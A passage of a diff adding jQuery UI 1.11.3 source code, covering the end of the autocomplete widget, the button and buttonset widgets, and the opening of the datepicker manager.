+				case keyCode.DOWN:
+					suppressKeyPress = true;
+					this._keyEvent( "next", event );
+					break;
+				case keyCode.ENTER:
+					// when menu is open and has focus
+					if ( this.menu.active ) {
+						// #6055 - Opera still allows the keypress to occur
+						// which causes forms to submit
+						suppressKeyPress = true;
+						event.preventDefault();
+						this.menu.select( event );
+					}
+					break;
+				case keyCode.TAB:
+					if ( this.menu.active ) {
+						this.menu.select( event );
+					}
+					break;
+				case keyCode.ESCAPE:
+					if ( this.menu.element.is( ":visible" ) ) {
+						if ( !this.isMultiLine ) {
+							this._value( this.term );
+						}
+						this.close( event );
+						// Different browsers have different default behavior for escape
+						// Single press can mean undo or clear
+						// Double press in IE means clear the whole form
+						event.preventDefault();
+					}
+					break;
+				default:
+					suppressKeyPressRepeat = true;
+					// search timeout should be triggered before the input value is changed
+					this._searchTimeout( event );
+					break;
+				}
+			},
+			keypress: function( event ) {
+				if ( suppressKeyPress ) {
+					suppressKeyPress = false;
+					if ( !this.isMultiLine || this.menu.element.is( ":visible" ) ) {
+						event.preventDefault();
+					}
+					return;
+				}
+				if ( suppressKeyPressRepeat ) {
+					return;
+				}
+
+				// replicate some key handlers to allow them to repeat in Firefox and Opera
+				var keyCode = $.ui.keyCode;
+				switch ( event.keyCode ) {
+				case keyCode.PAGE_UP:
+					this._move( "previousPage", event );
+					break;
+				case keyCode.PAGE_DOWN:
+					this._move( "nextPage", event );
+					break;
+				case keyCode.UP:
+					this._keyEvent( "previous", event );
+					break;
+				case keyCode.DOWN:
+					this._keyEvent( "next", event );
+					break;
+				}
+			},
+			input: function( event ) {
+				if ( suppressInput ) {
+					suppressInput = false;
+					event.preventDefault();
+					return;
+				}
+				this._searchTimeout( event );
+			},
+			focus: function() {
+				this.selectedItem = null;
+				this.previous = this._value();
+			},
+			blur: function( event ) {
+				if ( this.cancelBlur ) {
+					delete this.cancelBlur;
+					return;
+				}
+
+				clearTimeout( this.searching );
+				this.close( event );
+				this._change( event );
+			}
+		});
+
+		this._initSource();
+		this.menu = $( "<ul>" )
+			.addClass( "ui-autocomplete ui-front" )
+			.appendTo( this._appendTo() )
+			.menu({
+				// disable ARIA support, the live region takes care of that
+				role: null
+			})
+			.hide()
+			.menu( "instance" );
+
+		this._on( this.menu.element, {
+			mousedown: function( event ) {
+				// prevent moving focus out of the text field
+				event.preventDefault();
+
+				// IE doesn't prevent moving focus even with event.preventDefault()
+				// so we set a flag to know when we should ignore the blur event
+				this.cancelBlur = true;
+				this._delay(function() {
+					delete this.cancelBlur;
+				});
+
+				// clicking on the scrollbar causes focus to shift to the body
+				// but we can't detect a mouseup or a click immediately afterward
+				// so we have to track the next mousedown and close the menu if
+				// the user clicks somewhere outside of the autocomplete
+				var menuElement = this.menu.element[ 0 ];
+				if ( !$( event.target ).closest( ".ui-menu-item" ).length ) {
+					this._delay(function() {
+						var that = this;
+						this.document.one( "mousedown", function( event ) {
+							if ( event.target !== that.element[ 0 ] &&
+									event.target !== menuElement &&
+									!$.contains( menuElement, event.target ) ) {
+								that.close();
+							}
+						});
+					});
+				}
+			},
+			menufocus: function( event, ui ) {
+				var label, item;
+				// support: Firefox
+				// Prevent accidental activation of menu items in Firefox (#7024 #9118)
+				if ( this.isNewMenu ) {
+					this.isNewMenu = false;
+					if ( event.originalEvent && /^mouse/.test( event.originalEvent.type ) ) {
+						this.menu.blur();
+
+						this.document.one( "mousemove", function() {
+							$( event.target ).trigger( event.originalEvent );
+						});
+
+						return;
+					}
+				}
+
+				item = ui.item.data( "ui-autocomplete-item" );
+				if ( false !== this._trigger( "focus", event, { item: item } ) ) {
+					// use value to match what will end up in the input, if it was a key event
+					if ( event.originalEvent && /^key/.test( event.originalEvent.type ) ) {
+						this._value( item.value );
+					}
+				}
+
+				// Announce the value in the liveRegion
+				label = ui.item.attr( "aria-label" ) || item.value;
+				if ( label && $.trim( label ).length ) {
+					this.liveRegion.children().hide();
+					$( "<div>" ).text( label ).appendTo( this.liveRegion );
+				}
+			},
+			menuselect: function( event, ui ) {
+				var item = ui.item.data( "ui-autocomplete-item" ),
+					previous = this.previous;
+
+				// only trigger when focus was lost (click on menu)
+				if ( this.element[ 0 ] !== this.document[ 0 ].activeElement ) {
+					this.element.focus();
+					this.previous = previous;
+					// #6109 - IE triggers two focus events and the second
+					// is asynchronous, so we need to reset the previous
+					// term synchronously and asynchronously :-(
+					this._delay(function() {
+						this.previous = previous;
+						this.selectedItem = item;
+					});
+				}
+
+				if ( false !== this._trigger( "select", event, { item: item } ) ) {
+					this._value( item.value );
+				}
+				// reset the term after the select event
+				// this allows custom select handling to work properly
+				this.term = this._value();
+
+				this.close( event );
+				this.selectedItem = item;
+			}
+		});
+
+		this.liveRegion = $( "<span>", {
+				role: "status",
+				"aria-live": "assertive",
+				"aria-relevant": "additions"
+			})
+			.addClass( "ui-helper-hidden-accessible" )
+			.appendTo( this.document[ 0 ].body );
+
+		// turning off autocomplete prevents the browser from remembering the
+		// value when navigating through history, so we re-enable autocomplete
+		// if the page is unloaded before the widget is destroyed. #7790
+		this._on( this.window, {
+			beforeunload: function() {
+				this.element.removeAttr( "autocomplete" );
+			}
+		});
+	},
+
+	_destroy: function() {
+		clearTimeout( this.searching );
+		this.element
+			.removeClass( "ui-autocomplete-input" )
+			.removeAttr( "autocomplete" );
+		this.menu.element.remove();
+		this.liveRegion.remove();
+	},
+
+	_setOption: function( key, value ) {
+		this._super( key, value );
+		if ( key === "source" ) {
+			this._initSource();
+		}
+		if ( key === "appendTo" ) {
+			this.menu.element.appendTo( this._appendTo() );
+		}
+		if ( key === "disabled" && value && this.xhr ) {
+			this.xhr.abort();
+		}
+	},
+
+	_appendTo: function() {
+		var element = this.options.appendTo;
+
+		if ( element ) {
+			element = element.jquery || element.nodeType ?
+				$( element ) :
+				this.document.find( element ).eq( 0 );
+		}
+
+		if ( !element || !element[ 0 ] ) {
+			element = this.element.closest( ".ui-front" );
+		}
+
+		if ( !element.length ) {
+			element = this.document[ 0 ].body;
+		}
+
+		return element;
+	},
+
+	_initSource: function() {
+		var array, url,
+			that = this;
+		if ( $.isArray( this.options.source ) ) {
+			array = this.options.source;
+			this.source = function( request, response ) {
+				response( $.ui.autocomplete.filter( array, request.term ) );
+			};
+		} else if ( typeof this.options.source === "string" ) {
+			url = this.options.source;
+			this.source = function( request, response ) {
+				if ( that.xhr ) {
+					that.xhr.abort();
+				}
+				that.xhr = $.ajax({
+					url: url,
+					data: request,
+					dataType: "json",
+					success: function( data ) {
+						response( data );
+					},
+					error: function() {
+						response([]);
+					}
+				});
+			};
+		} else {
+			this.source = this.options.source;
+		}
+	},
+
+	_searchTimeout: function( event ) {
+		clearTimeout( this.searching );
+		this.searching = this._delay(function() {
+
+			// Search if the value has changed, or if the user retypes the same value (see #7434)
+			var equalValues = this.term === this._value(),
+				menuVisible = this.menu.element.is( ":visible" ),
+				modifierKey = event.altKey || event.ctrlKey || event.metaKey || event.shiftKey;
+
+			if ( !equalValues || ( equalValues && !menuVisible && !modifierKey ) ) {
+				this.selectedItem = null;
+				this.search( null, event );
+			}
+		}, this.options.delay );
+	},
+
+	search: function( value, event ) {
+		value = value != null ? value : this._value();
+
+		// always save the actual value, not the one passed as an argument
+		this.term = this._value();
+
+		if ( value.length < this.options.minLength ) {
+			return this.close( event );
+		}
+
+		if ( this._trigger( "search", event ) === false ) {
+			return;
+		}
+
+		return this._search( value );
+	},
+
+	_search: function( value ) {
+		this.pending++;
+		this.element.addClass( "ui-autocomplete-loading" );
+		this.cancelSearch = false;
+
+		this.source( { term: value }, this._response() );
+	},
+
+	_response: function() {
+		var index = ++this.requestIndex;
+
+		return $.proxy(function( content ) {
+			if ( index === this.requestIndex ) {
+				this.__response( content );
+			}
+
+			this.pending--;
+			if ( !this.pending ) {
+				this.element.removeClass( "ui-autocomplete-loading" );
+			}
+		}, this );
+	},
+
+	__response: function( content ) {
+		if ( content ) {
+			content = this._normalize( content );
+		}
+		this._trigger( "response", null, { content: content } );
+		if ( !this.options.disabled && content && content.length && !this.cancelSearch ) {
+			this._suggest( content );
+			this._trigger( "open" );
+		} else {
+			// use ._close() instead of .close() so we don't cancel future searches
+			this._close();
+		}
+	},
+
+	close: function( event ) {
+		this.cancelSearch = true;
+		this._close( event );
+	},
+
+	_close: function( event ) {
+		if ( this.menu.element.is( ":visible" ) ) {
+			this.menu.element.hide();
+			this.menu.blur();
+			this.isNewMenu = true;
+			this._trigger( "close", event );
+		}
+	},
+
+	_change: function( event ) {
+		if ( this.previous !== this._value() ) {
+			this._trigger( "change", event, { item: this.selectedItem } );
+		}
+	},
+
+	_normalize: function( items ) {
+		// assume all items have the right format when the first item is complete
+		if ( items.length && items[ 0 ].label && items[ 0 ].value ) {
+			return items;
+		}
+		return $.map( items, function( item ) {
+			if ( typeof item === "string" ) {
+				return {
+					label: item,
+					value: item
+				};
+			}
+			return $.extend( {}, item, {
+				label: item.label || item.value,
+				value: item.value || item.label
+			});
+		});
+	},
+
+	_suggest: function( items ) {
+		var ul = this.menu.element.empty();
+		this._renderMenu( ul, items );
+		this.isNewMenu = true;
+		this.menu.refresh();
+
+		// size and position menu
+		ul.show();
+		this._resizeMenu();
+		ul.position( $.extend({
+			of: this.element
+		}, this.options.position ) );
+
+		if ( this.options.autoFocus ) {
+			this.menu.next();
+		}
+	},
+
+	_resizeMenu: function() {
+		var ul = this.menu.element;
+		ul.outerWidth( Math.max(
+			// Firefox wraps long text (possibly a rounding bug)
+			// so we add 1px to avoid the wrapping (#7513)
+			ul.width( "" ).outerWidth() + 1,
+			this.element.outerWidth()
+		) );
+	},
+
+	_renderMenu: function( ul, items ) {
+		var that = this;
+		$.each( items, function( index, item ) {
+			that._renderItemData( ul, item );
+		});
+	},
+
+	_renderItemData: function( ul, item ) {
+		return this._renderItem( ul, item ).data( "ui-autocomplete-item", item );
+	},
+
+	_renderItem: function( ul, item ) {
+		return $( "<li>" ).text( item.label ).appendTo( ul );
+	},
+
+	_move: function( direction, event ) {
+		if ( !this.menu.element.is( ":visible" ) ) {
+			this.search( null, event );
+			return;
+		}
+		if ( this.menu.isFirstItem() && /^previous/.test( direction ) ||
+				this.menu.isLastItem() && /^next/.test( direction ) ) {
+
+			if ( !this.isMultiLine ) {
+				this._value( this.term );
+			}
+
+			this.menu.blur();
+			return;
+		}
+		this.menu[ direction ]( event );
+	},
+
+	widget: function() {
+		return this.menu.element;
+	},
+
+	_value: function() {
+		return this.valueMethod.apply( this.element, arguments );
+	},
+
+	_keyEvent: function( keyEvent, event ) {
+		if ( !this.isMultiLine || this.menu.element.is( ":visible" ) ) {
+			this._move( keyEvent, event );
+
+			// prevents moving cursor to beginning/end of the text field in some browsers
+			event.preventDefault();
+		}
+	}
+});
+
+$.extend( $.ui.autocomplete, {
+	escapeRegex: function( value ) {
+		return value.replace( /[\-\[\]{}()*+?.,\\\^$|#\s]/g, "\\$&" );
+	},
+	filter: function( array, term ) {
+		var matcher = new RegExp( $.ui.autocomplete.escapeRegex( term ), "i" );
+		return $.grep( array, function( value ) {
+			return matcher.test( value.label || value.value || value );
+		});
+	}
+});
+
+// live region extension, adding a `messages` option
+// NOTE: This is an experimental API. We are still investigating
+// a full solution for string manipulation and internationalization.
+$.widget( "ui.autocomplete", $.ui.autocomplete, {
+	options: {
+		messages: {
+			noResults: "No search results.",
+			results: function( amount ) {
+				return amount + ( amount > 1 ? " results are" : " result is" ) +
+					" available, use up and down arrow keys to navigate.";
+			}
+		}
+	},
+
+	__response: function( content ) {
+		var message;
+		this._superApply( arguments );
+		if ( this.options.disabled || this.cancelSearch ) {
+			return;
+		}
+		if ( content && content.length ) {
+			message = this.options.messages.results( content.length );
+		} else {
+			message = this.options.messages.noResults;
+		}
+		this.liveRegion.children().hide();
+		$( "<div>" ).text( message ).appendTo( this.liveRegion );
+	}
+});
+
+var autocomplete = $.ui.autocomplete;
+
+
+/*!
+ * jQuery UI Button 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/button/
+ */
+
+
+var lastActive,
+	baseClasses = "ui-button ui-widget ui-state-default ui-corner-all",
+	typeClasses = "ui-button-icons-only ui-button-icon-only ui-button-text-icons ui-button-text-icon-primary ui-button-text-icon-secondary ui-button-text-only",
+	formResetHandler = function() {
+		var form = $( this );
+		setTimeout(function() {
+			form.find( ":ui-button" ).button( "refresh" );
+		}, 1 );
+	},
+	radioGroup = function( radio ) {
+		var name = radio.name,
+			form = radio.form,
+			radios = $( [] );
+		if ( name ) {
+			name = name.replace( /'/g, "\\'" );
+			if ( form ) {
+				radios = $( form ).find( "[name='" + name + "'][type=radio]" );
+			} else {
+				radios = $( "[name='" + name + "'][type=radio]", radio.ownerDocument )
+					.filter(function() {
+						return !this.form;
+					});
+			}
+		}
+		return radios;
+	};
+
+$.widget( "ui.button", {
+	version: "1.11.3",
+	defaultElement: "<button>",
+	options: {
+		disabled: null,
+		text: true,
+		label: null,
+		icons: {
+			primary: null,
+			secondary: null
+		}
+	},
+	_create: function() {
+		this.element.closest( "form" )
+			.unbind( "reset" + this.eventNamespace )
+			.bind( "reset" + this.eventNamespace, formResetHandler );
+
+		if ( typeof this.options.disabled !== "boolean" ) {
+			this.options.disabled = !!this.element.prop( "disabled" );
+		} else {
+			this.element.prop( "disabled", this.options.disabled );
+		}
+
+		this._determineButtonType();
+		this.hasTitle = !!this.buttonElement.attr( "title" );
+
+		var that = this,
+			options = this.options,
+			toggleButton = this.type === "checkbox" || this.type === "radio",
+			activeClass = !toggleButton ? "ui-state-active" : "";
+
+		if ( options.label === null ) {
+			options.label = (this.type === "input" ? this.buttonElement.val() : this.buttonElement.html());
+		}
+
+		this._hoverable( this.buttonElement );
+
+		this.buttonElement
+			.addClass( baseClasses )
+			.attr( "role", "button" )
+			.bind( "mouseenter" + this.eventNamespace, function() {
+				if ( options.disabled ) {
+					return;
+				}
+				if ( this === lastActive ) {
+					$( this ).addClass( "ui-state-active" );
+				}
+			})
+			.bind( "mouseleave" + this.eventNamespace, function() {
+				if ( options.disabled ) {
+					return;
+				}
+				$( this ).removeClass( activeClass );
+			})
+			.bind( "click" + this.eventNamespace, function( event ) {
+				if ( options.disabled ) {
+					event.preventDefault();
+					event.stopImmediatePropagation();
+				}
+			});
+
+		// Can't use _focusable() because the element that receives focus
+		// and the element that gets the ui-state-focus class are different
+		this._on({
+			focus: function() {
+				this.buttonElement.addClass( "ui-state-focus" );
+			},
+			blur: function() {
+				this.buttonElement.removeClass( "ui-state-focus" );
+			}
+		});
+
+		if ( toggleButton ) {
+			this.element.bind( "change" + this.eventNamespace, function() {
+				that.refresh();
+			});
+		}
+
+		if ( this.type === "checkbox" ) {
+			this.buttonElement.bind( "click" + this.eventNamespace, function() {
+				if ( options.disabled ) {
+					return false;
+				}
+			});
+		} else if ( this.type === "radio" ) {
+			this.buttonElement.bind( "click" + this.eventNamespace, function() {
+				if ( options.disabled ) {
+					return false;
+				}
+				$( this ).addClass( "ui-state-active" );
+				that.buttonElement.attr( "aria-pressed", "true" );
+
+				var radio = that.element[ 0 ];
+				radioGroup( radio )
+					.not( radio )
+					.map(function() {
+						return $( this ).button( "widget" )[ 0 ];
+					})
+					.removeClass( "ui-state-active" )
+					.attr( "aria-pressed", "false" );
+			});
+		} else {
+			this.buttonElement
+				.bind( "mousedown" + this.eventNamespace, function() {
+					if ( options.disabled ) {
+						return false;
+					}
+					$( this ).addClass( "ui-state-active" );
+					lastActive = this;
+					that.document.one( "mouseup", function() {
+						lastActive = null;
+					});
+				})
+				.bind( "mouseup" + this.eventNamespace, function() {
+					if ( options.disabled ) {
+						return false;
+					}
+					$( this ).removeClass( "ui-state-active" );
+				})
+				.bind( "keydown" + this.eventNamespace, function(event) {
+					if ( options.disabled ) {
+						return false;
+					}
+					if ( event.keyCode === $.ui.keyCode.SPACE || event.keyCode === $.ui.keyCode.ENTER ) {
+						$( this ).addClass( "ui-state-active" );
+					}
+				})
+				// see #8559, we bind to blur here in case the button element loses
+				// focus between keydown and keyup, it would be left in an "active" state
+				.bind( "keyup" + this.eventNamespace + " blur" + this.eventNamespace, function() {
+					$( this ).removeClass( "ui-state-active" );
+				});
+
+			if ( this.buttonElement.is("a") ) {
+				this.buttonElement.keyup(function(event) {
+					if ( event.keyCode === $.ui.keyCode.SPACE ) {
+						// TODO pass through original event correctly (just as 2nd argument doesn't work)
+						$( this ).click();
+					}
+				});
+			}
+		}
+
+		this._setOption( "disabled", options.disabled );
+		this._resetButton();
+	},
+
+	_determineButtonType: function() {
+		var ancestor, labelSelector, checked;
+
+		if ( this.element.is("[type=checkbox]") ) {
+			this.type = "checkbox";
+		} else if ( this.element.is("[type=radio]") ) {
+			this.type = "radio";
+		} else if ( this.element.is("input") ) {
+			this.type = "input";
+		} else {
+			this.type = "button";
+		}
+
+		if ( this.type === "checkbox" || this.type === "radio" ) {
+			// we don't search against the document in case the element
+			// is disconnected from the DOM
+			ancestor = this.element.parents().last();
+			labelSelector = "label[for='" + this.element.attr("id") + "']";
+			this.buttonElement = ancestor.find( labelSelector );
+			if ( !this.buttonElement.length ) {
+				ancestor = ancestor.length ? ancestor.siblings() : this.element.siblings();
+				this.buttonElement = ancestor.filter( labelSelector );
+				if ( !this.buttonElement.length ) {
+					this.buttonElement = ancestor.find( labelSelector );
+				}
+			}
+			this.element.addClass( "ui-helper-hidden-accessible" );
+
+			checked = this.element.is( ":checked" );
+			if ( checked ) {
+				this.buttonElement.addClass( "ui-state-active" );
+			}
+			this.buttonElement.prop( "aria-pressed", checked );
+		} else {
+			this.buttonElement = this.element;
+		}
+	},
+
+	widget: function() {
+		return this.buttonElement;
+	},
+
+	_destroy: function() {
+		this.element
+			.removeClass( "ui-helper-hidden-accessible" );
+		this.buttonElement
+			.removeClass( baseClasses + " ui-state-active " + typeClasses )
+			.removeAttr( "role" )
+			.removeAttr( "aria-pressed" )
+			.html( this.buttonElement.find(".ui-button-text").html() );
+
+		if ( !this.hasTitle ) {
+			this.buttonElement.removeAttr( "title" );
+		}
+	},
+
+	_setOption: function( key, value ) {
+		this._super( key, value );
+		if ( key === "disabled" ) {
+			this.widget().toggleClass( "ui-state-disabled", !!value );
+			this.element.prop( "disabled", !!value );
+			if ( value ) {
+				if ( this.type === "checkbox" || this.type === "radio" ) {
+					this.buttonElement.removeClass( "ui-state-focus" );
+				} else {
+					this.buttonElement.removeClass( "ui-state-focus ui-state-active" );
+				}
+			}
+			return;
+		}
+		this._resetButton();
+	},
+
+	refresh: function() {
+		//See #8237 & #8828
+		var isDisabled = this.element.is( "input, button" ) ? this.element.is( ":disabled" ) : this.element.hasClass( "ui-button-disabled" );
+
+		if ( isDisabled !== this.options.disabled ) {
+			this._setOption( "disabled", isDisabled );
+		}
+		if ( this.type === "radio" ) {
+			radioGroup( this.element[0] ).each(function() {
+				if ( $( this ).is( ":checked" ) ) {
+					$( this ).button( "widget" )
+						.addClass( "ui-state-active" )
+						.attr( "aria-pressed", "true" );
+				} else {
+					$( this ).button( "widget" )
+						.removeClass( "ui-state-active" )
+						.attr( "aria-pressed", "false" );
+				}
+			});
+		} else if ( this.type === "checkbox" ) {
+			if ( this.element.is( ":checked" ) ) {
+				this.buttonElement
+					.addClass( "ui-state-active" )
+					.attr( "aria-pressed", "true" );
+			} else {
+				this.buttonElement
+					.removeClass( "ui-state-active" )
+					.attr( "aria-pressed", "false" );
+			}
+		}
+	},
+
+	_resetButton: function() {
+		if ( this.type === "input" ) {
+			if ( this.options.label ) {
+				this.element.val( this.options.label );
+			}
+			return;
+		}
+		var buttonElement = this.buttonElement.removeClass( typeClasses ),
+			buttonText = $( "<span></span>", this.document[0] )
+				.addClass( "ui-button-text" )
+				.html( this.options.label )
+				.appendTo( buttonElement.empty() )
+				.text(),
+			icons = this.options.icons,
+			multipleIcons = icons.primary && icons.secondary,
+			buttonClasses = [];
+
+		if ( icons.primary || icons.secondary ) {
+			if ( this.options.text ) {
+				buttonClasses.push( "ui-button-text-icon" + ( multipleIcons ? "s" : ( icons.primary ? "-primary" : "-secondary" ) ) );
+			}
+
+			if ( icons.primary ) {
+				buttonElement.prepend( "<span class='ui-button-icon-primary ui-icon " + icons.primary + "'></span>" );
+			}
+
+			if ( icons.secondary ) {
+				buttonElement.append( "<span class='ui-button-icon-secondary ui-icon " + icons.secondary + "'></span>" );
+			}
+
+			if ( !this.options.text ) {
+				buttonClasses.push( multipleIcons ? "ui-button-icons-only" : "ui-button-icon-only" );
+
+				if ( !this.hasTitle ) {
+					buttonElement.attr( "title", $.trim( buttonText ) );
+				}
+			}
+		} else {
+			buttonClasses.push( "ui-button-text-only" );
+		}
+		buttonElement.addClass( buttonClasses.join( " " ) );
+	}
+});
+
+$.widget( "ui.buttonset", {
+	version: "1.11.3",
+	options: {
+		items: "button, input[type=button], input[type=submit], input[type=reset], input[type=checkbox], input[type=radio], a, :data(ui-button)"
+	},
+
+	_create: function() {
+		this.element.addClass( "ui-buttonset" );
+	},
+
+	_init: function() {
+		this.refresh();
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "disabled" ) {
+			this.buttons.button( "option", key, value );
+		}
+
+		this._super( key, value );
+	},
+
+	refresh: function() {
+		var rtl = this.element.css( "direction" ) === "rtl",
+			allButtons = this.element.find( this.options.items ),
+			existingButtons = allButtons.filter( ":ui-button" );
+
+		// Initialize new buttons
+		allButtons.not( ":ui-button" ).button();
+
+		// Refresh existing buttons
+		existingButtons.button( "refresh" );
+
+		this.buttons = allButtons
+			.map(function() {
+				return $( this ).button( "widget" )[ 0 ];
+			})
+				.removeClass( "ui-corner-all ui-corner-left ui-corner-right" )
+				.filter( ":first" )
+					.addClass( rtl ? "ui-corner-right" : "ui-corner-left" )
+				.end()
+				.filter( ":last" )
+					.addClass( rtl ? "ui-corner-left" : "ui-corner-right" )
+				.end()
+			.end();
+	},
+
+	_destroy: function() {
+		this.element.removeClass( "ui-buttonset" );
+		this.buttons
+			.map(function() {
+				return $( this ).button( "widget" )[ 0 ];
+			})
+				.removeClass( "ui-corner-left ui-corner-right" )
+			.end()
+			.button( "destroy" );
+	}
+});
+
+var button = $.ui.button;
+
+
+/*!
+ * jQuery UI Datepicker 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/datepicker/
+ */
+
+
+$.extend($.ui, { datepicker: { version: "1.11.3" } });
+
+var datepicker_instActive;
+
+function datepicker_getZindex( elem ) {
+	var position, value;
+	while ( elem.length && elem[ 0 ] !== document ) {
+		// Ignore z-index if position is set to a value where z-index is ignored by the browser
+		// This makes behavior of this function consistent across browsers
+		// WebKit always returns auto if the element is positioned
+		position = elem.css( "position" );
+		if ( position === "absolute" || position === "relative" || position === "fixed" ) {
+			// IE returns 0 when zIndex is not specified
+			// other browsers return a string
+			// we ignore the case of nested elements with an explicit value of 0
+			// <div style="z-index: -10;"><div style="z-index: 0;"></div></div>
+			value = parseInt( elem.css( "zIndex" ), 10 );
+			if ( !isNaN( value ) && value !== 0 ) {
+				return value;
+			}
+		}
+		elem = elem.parent();
+	}
+
+	return 0;
+}
+/* Date picker manager.
+   Use the singleton instance of this class, $.datepicker, to interact with the date picker.
+   Settings for (groups of) date pickers are maintained in an instance object,
+   allowing multiple different settings on the same page. */
+
+function Datepicker() {
+	this._curInst = null; // The current instance in use
+	this._keyEvent = false; // If the last event was a key event
+	this._disabledInputs = []; // List of date picker inputs that have been disabled
+	this._datepickerShowing = false; // True if the popup picker is showing , false if not
+	this._inDialog = false; // True if showing within a "dialog", false if not
+	this._mainDivId = "ui-datepicker-div"; // The ID of the main datepicker division
+	this._inlineClass = "ui-datepicker-inline"; // The name of the inline marker class
+	this._appendClass = "ui-datepicker-append"; // The name of the append marker class
+	this._triggerClass = "ui-datepicker-trigger"; // The name of the trigger marker class
+	this._dialogClass = "ui-datepicker-dialog"; // The name of the dialog marker class
+	this._disableClass = "ui-datepicker-disabled"; // The name of the disabled covering marker class
+	this._unselectableClass = "ui-datepicker-unselectable"; // The name of the unselectable cell marker class
+	this._currentClass = "ui-datepicker-current-day"; // The name of the current day marker class
+	this._dayOverClass = "ui-datepicker-days-cell-over"; // The name of the day hover marker class
+	this.regional = []; // Available regional settings, indexed by language code
+	this.regional[""] = { // Default regional settings
+		closeText: "Done", // Display text for close link
+		prevText: "Prev", // Display text for previous month link
+		nextText: "Next", // Display text for next month link
+		currentText: "Today", // Display text for current month link
+		monthNames: ["January","February","March","April","May","June",
+			"July","August","September","October","November","December"], // Names of months for drop-down and formatting
+		monthNamesShort: ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], // For formatting
+		dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"], // For formatting
+		dayNamesShort: ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"], // For formatting
+		dayNamesMin: ["Su","Mo","Tu","We","Th","Fr","Sa"], // Column headings for days starting at Sunday
+		weekHeader: "Wk", // Column header for week of the year
+		dateFormat: "mm/dd/yy", // See format options on parseDate
+		firstDay: 0, // The first day of the week, Sun = 0, Mon = 1, ...
+		isRTL: false, // True if right-to-left language, false if left-to-right
+		showMonthAfterYear: false, // True if the year select precedes month, false for month then year
+		yearSuffix: "" // Additional text to append to the year in the month headers
+	};
+	this._defaults = { // Global defaults for all the date picker instances
+		showOn: "focus", // "focus" for popup on focus,
+			// "button" for trigger button, or "both" for either
+		showAnim: "fadeIn", // Name of jQuery animation for popup
+		showOptions: {}, // Options for enhanced animations
+		defaultDate: null, // Used when field is blank: actual date,
+			// +/-number for offset from today, null for today
+		appendText: "", // Display text following the input box, e.g. showing the format
+		buttonText: "...", // Text for trigger button
+		buttonImage: "", // URL for trigger button image
+		buttonImageOnly: false, // True if the image appears alone, false if it appears on a button
+		hideIfNoPrevNext: false, // True to hide next/previous month links
+			// if not applicable, false to just disable them
+		navigationAsDateFormat: false, // True if date formatting applied to prev/today/next links
+		gotoCurrent: false, // True if today link goes back to current selection instead
+		changeMonth: false, // True if month can be selected directly, false if only prev/next
+		changeYear: false, // True if year can be selected directly, false if only prev/next
+		yearRange: "c-10:c+10", // Range of years to display in drop-down,
+			// either relative to today's year (-nn:+nn), relative to currently displayed year
+			// (c-nn:c+nn), absolute (nnnn:nnnn), or a combination of the above (nnnn:-n)
+		showOtherMonths: false, // True to show dates in other months, false to leave blank
+		selectOtherMonths: false, // True to allow selection of dates in other months, false for unselectable
+		showWeek: false, // True to show week of the year, false to not show it
+		calculateWeek: this.iso8601Week, // How to calculate the week of the year,
+			// takes a Date and returns the number of the week for it
+		shortYearCutoff: "+10", // Short year values < this are in the current century,
+			// > this are in the previous century,
+			// string value starting with "+" for current year + value
+		minDate: null, // The earliest selectable date, or null for no limit
+		maxDate: null, // The latest selectable date, or null for no limit
+		duration: "fast", // Duration of display/closure
+		beforeShowDay: null, // Function that takes a date and returns an array with
+			// [0] = true if selectable, false if not, [1] = custom CSS class name(s) or "",
+			// [2] = cell title (optional), e.g. $.datepicker.noWeekends
+		beforeShow: null, // Function that takes an input field and
+			// returns a set of custom settings for the date picker
+		onSelect: null, // Define a callback function when a date is selected
+		onChangeMonthYear: null, // Define a callback function when the month or year is changed
+		onClose: null, // Define a callback function when the datepicker is closed
+		numberOfMonths: 1, // Number of months to show at a time
+		showCurrentAtPos: 0, // The position in multipe months at which to show the current month (starting at 0)
+		stepMonths: 1, // Number of months to step back/forward
+		stepBigMonths: 12, // Number of months to step back/forward for the big links
+		altField: "", // Selector for an alternate field to store selected dates into
+		altFormat: "", // The date format to use for the alternate field
+		constrainInput: true, // The input is constrained by the current date format
+		showButtonPanel: false, // True to show button panel, false to not show it
+		autoSize: false, // True to size the input for the date format, false to leave as is
+		disabled: false // The initial disabled state
+	};
+	$.extend(this._defaults, this.regional[""]);
+	this.regional.en = $.extend( true, {}, this.regional[ "" ]);
+	this.regional[ "en-US" ] = $.extend( true, {}, this.regional.en );
+	this.dpDiv = datepicker_bindHover($("<div id='" + this._mainDivId + "' class='ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>"));
+}
+
+$.extend(Datepicker.prototype, {
+	/* Class name added to elements to indicate already configured with a date picker. */
+	markerClassName: "hasDatepicker",
+
+	//Keep track of the maximum number of rows displayed (see #7043)
+	maxRows: 4,
+
+	// TODO rename to "widget" when switching to widget factory
+	_widgetDatepicker: function() {
+		return this.dpDiv;
+	},
+
+	/* Override the default settings for all instances of the date picker.
+	 * @param  settings  object - the new settings to use as defaults (anonymous object)
+	 * @return the manager object
+	 */
+	setDefaults: function(settings) {
+		datepicker_extendRemove(this._defaults, settings || {});
+		return this;
+	},
+
+	/* Attach the date picker to a jQuery selection.
+	 * @param  target	element - the target input field or division or span
+	 * @param  settings  object - the new settings to use for this date picker instance (anonymous)
+	 */
+	_attachDatepicker: function(target, settings) {
+		var nodeName, inline, inst;
+		nodeName = target.nodeName.toLowerCase();
+		inline = (nodeName === "div" || nodeName === "span");
+		if (!target.id) {
+			this.uuid += 1;
+			target.id = "dp" + this.uuid;
+		}
+		inst = this._newInst($(target), inline);
+		inst.settings = $.extend({}, settings || {});
+		if (nodeName === "input") {
+			this._connectDatepicker(target, inst);
+		} else if (inline) {
+			this._inlineDatepicker(target, inst);
+		}
+	},
+
+	/* Create a new instance object. */
+	_newInst: function(target, inline) {
+		var id = target[0].id.replace(/([^A-Za-z0-9_\-])/g, "\\\\$1"); // escape jQuery meta chars
+		return {id: id, input: target, // associated target
